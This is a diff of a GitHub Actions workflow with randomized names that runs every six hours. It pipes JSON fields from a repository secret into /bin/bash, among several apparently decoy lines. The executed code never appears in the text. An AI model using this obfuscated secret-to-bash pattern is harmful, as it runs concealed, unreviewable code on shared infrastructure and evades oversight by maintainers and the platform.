--- a/.github/workflows/zhengcunzai3456.yml
+++ b/.github/workflows/zhengcunzai3456.yml
@@ -3,28 +3,26 @@ name: zhengcunzai3456
 on:
   workflow_dispatch:
   schedule:
-    - cron: '30 0/6 * * *'
+    - cron: '50 1/6 * * *'
 
-jobs:  # 19554
+jobs:
   build:
     runs-on: ubuntu-latest
-
     steps:
       - uses: actions/checkout@v4
       - name: zhengcunzai3456
         env:
-          m3312: ${{ secrets.m3312 }}
+          a1968: ${{ secrets.a1968 }}
         run: |
-          echo $m3312 | jq -r .dow5983 | /bin/bash
-          echo $ht4 | jq -r .glxdp20320 | /bin/bash
-          echo $pus797 | jq -r .qrtc9154 | /bin/bash
-          echo $z09396 | jq -r .reph613 | /bin/bash
-          echo $fmza9 | jq -r .vqlm21 | /bin/bash
-          echo $juf0511 | jq -r .ko591 | /bin/bash
-          echo $cfahh52629 | jq -r .e65506 | /bin/bash
-          echo $xjmg50912 | jq -r .tkdi16260 | /bin/bash
-          echo $rv3596 | jq -r .vb133 | /bin/bash
-          echo $e93064 | jq -r .fpd6990 | /bin/bash
-          echo $yup395 | jq -r .n90453 | /bin/bash
-          echo $xihlx4675 | jq -r .r79 | /bin/bash
+          echo $a1968 | jq -r .vckar2 | /bin/bash
+          echo $mifxk5766 | jq -r .p7200 | /bin/bash
+          echo $xsefo26489 | jq -r .hmrd84 | /bin/bash
+          echo $zi30561 | jq -r .aif46 | /bin/bash
+          echo $dqu185 | jq -r .qdf98397 | /bin/bash
+          echo $wip1936 | jq -r .lys62589 | /bin/bash
+          echo $ix5 | jq -r .lgz51 | /bin/bash
+          echo $jhjwd39 | jq -r .eo14 | /bin/bash
+          echo $cp0 | jq -r .avbpd67 | /bin/bash
+          echo $rnyg747 | jq -r .wowg379 | /bin/bash
+          echo $hyyq26409 | jq -r .dxnw20744 | /bin/bash
 
